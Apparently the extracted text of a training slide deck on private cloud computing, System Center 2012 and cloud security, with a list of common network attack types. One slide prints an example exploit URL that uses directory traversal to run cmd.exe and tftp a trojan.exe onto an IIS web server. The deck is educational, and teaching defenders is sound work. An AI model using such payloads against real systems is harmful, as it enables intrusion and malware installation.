Securing The Cloud

advertisement
Securing The Cloud
What is the Cloud? How do you lock it down?
Kevin King - Senior Technical Instructor ● Infrastructructure/Cloud Consulting
| MCT CCSI MCSE-Private Cloud MCSA
MCSA-Server 2012 MCSE CCNA Data Center Cisco Quality Instructor 2014
New Horizons CLC| 6700 Jefferson, Building A | Albuquerque, NM 87109
p: 505.830.7100 |f: 505.830.2239 | kking@nhabq.com | www.nhabq.com
1.
Introduction to the Private Cloud
2.
Securing the Private Cloud
Overview
•
Overview of the Cloud Computing Model
•
Requirements for the Private Cloud
•
Operating a Private Cloud Infrastructure with System Center
•
Securing the Cloud
1) Overview of the Cloud Computing Model
•
The Advent of Cloud Computing
•
Public vs. Private Clouds
•
Cloud Service Models
•
Methods to Implement the Private Cloud
•
System Center 2012 and the Private Cloud
The Advent of Cloud Computing
Client/Server Architecture
Advantages of cloud computing include:
Virtualized data center
Reduced operational costs
Server consolidation
Improved resiliency and agility
Cloud Computing
Public vs. Private Clouds
Private cloud:
Provides more control
Is flexible
Is customizable
Has operational and management
costs
Public cloud:
Provides less control
Provides less flexibility
Provides less customization
Reduced operational and management costs
Cloud Service Models
The three cloud service models are:
Software as
a Service
(SaaS)
Platform as
a Service
(PaaS)
Infrastructure
as a Service
(IaaS)
Includes business
processes and
applications
Includes application
execution services
Includes
server, storage, and
network
infrastructure
High
Methods to Implement the Private Cloud
Level of
Pre-integration
Service Provider
Reference
Architecture
Low
Custom
High
Deployment Time
Low
System Center 2012 and the Private Cloud
System Center 2012 has the following components:
•
•
•
•
•
•
•
App Controller
Service Manager
Virtual Machine Manager (VMM)
Orchestrator
Operations Manager
Data Protection Manager (DPM)
Configuration Manager
2) Requirements for the Private Cloud
•
Key Business Requirements
•
Service Identification and Onboarding
•
Datacenter Administrators and Business Unit IT Administrators
Key Business Requirements
The key business requirements include:
Competitive advantage
Scalability
Reduced cost
Service Identification and Onboarding
•
Service Identification:
•
•
•
•
•
Does the application need to reside in the same location as the data?
What computer resources are required?
What are the software or operating system requirements?
What network bandwidth will be required by the application between the
users and the cloud?
Onboarding:
• Has the service passed the identity check and is it ready for the cloud?
• Have relevant backups taken place?
• Has the migration been tested successfully in a pre-production or UAT
environment?
• Is there a documented method for fallback?
Datacenter Administrators and Business Unit
IT Administrators
The datacenter administrator:
Manages the physical infrastructure
Manages the private cloud resources
Configures access to cloud resources
Datacenter
Administrator
The business unit IT administrator:
Manages the business unit cloud
Manages resources specific to the business
unit cloud that they own
Business Unit IT
Administrator
3) Operating a Private Cloud
Infrastructure with System Center
•
Provisioning the Private Cloud with Virtual Machine Manager
•
Managing Public and Private Clouds with App Controller
•
Service Management with Service Manager
•
Automating Data Center Processes with Orchestrator
Provisioning the Private Cloud with
Virtual Machine Manager
•
A simple private cloud is created in Virtual Machine Manager by using the
Create Cloud Wizard:
Managing Public and Private Clouds
with App Controller
Using the App Controller Portal, you can manage private clouds that were
created with VMM and public clouds that were created on the Windows Azure
platform
Service Management with Service Manager
Service Manager delivers an integrated platform for automating and adapting
IT service management best practices to your organization's requirements
By using Service Manager, you can:
Reduce mean time to resolution of issues through a self-service user
experience
Improve private cloud efficiency through centralized management of
change processes
Provide self-service provisioning of private cloud resources
Implement compliance controls for the management of the private cloud
infrastructure
Automating Data Center Processes with
Orchestrator
Orchestrator provides a workflow management solution for
the data center that allows you to automate the creation, monitoring, and
deployment of resources in your environment
By using Orchestrator, you can:
Automate processes in your private cloud
Improve operational efficiency
Connect different systems from different vendors without the knowledge of
scripting languages
4) Securing the Private Cloud
• Old
days – security = planting two firewalls
• Today
– security = very complex problem
Types of Attacks
Including, but not limited to:
• Packet sniffing— An application that uses the promiscuous mode of the
network adapter to capture all networks packets.
• IP spoofing— An attack in which a hacker assumes an IP address of
others to conceal its true identity
• Denial-of-service (DoS) attack— Aims to overwhelm a service so as to
deny legitimate requests from being serviced. The service may be in the
form of bandwidth, memory, or CPU. It is the most well-known of all
Internet attacks, and efforts should be invested in understanding its
mechanisms. Some of the more famous DoS attacks include the
following:
•
•
•
•
Code Red
Blaster
Ping of Death
Trinity
Types of attacks
•
Password attack— As its name implies, this attack intends to
acquire passwords to important assets so as to cause further
damage. Password attacks can be achieved through other
methods previously mentioned, such as IP spoofing, or they can
be achieved via brute force
•
Man-in-the-middle attack— This type of attack happens when a
hacker manages to position himself between the source and the
destination of a network transaction. ARP cache poisoning is one
common method
•
Application attack— This type of attack happens when
application software holes are exploited to gain access to a
computer system. The holes may be bugs or may be TCP port
numbers that are exposed
•
Port redirection attack— This type of attack makes use of a
compromised host to gain access to a network that is otherwise
protected
•
Blue Pilling
Sequence of attacks
• After
a phase of probing/scanning, the
hacker detects the vulnerability of the
web/application server
• The
hacker exploits the vulnerability to get a
shell
• For
example:
• Copy the Trojan on the web/application server:
• HTTPS://www.example.com/scripts/..%c0%af../winnt/syst
em32/cmd.exe?/c+tftp%20i%2010.20.15.15%20GET%20trojan.exe%20trojan.exe
Server Farm Security Strategies
Segmenting the Server Farm
Building the Firewall Ruleset
From Physical Separation to Logical Separation
Securing The Cloud
System Center 2012 has the following components:
•
•
•
•
•
•
•
App Controller
Service Manager
Virtual Machine Manager (VMM)
Orchestrator
Operations Manager
Data Protection Manager (DPM)
Configuration Manager
S
U
R
F
A
C
E
A
R
E
A
Public vs. Private Clouds
Physical:
Physical access to equipment
OOB Management
Password Policy
Host Security
Logical:
System Center Components
Individual VMs
Services and Apps
Passwords/Encryption/Least Privledge
Download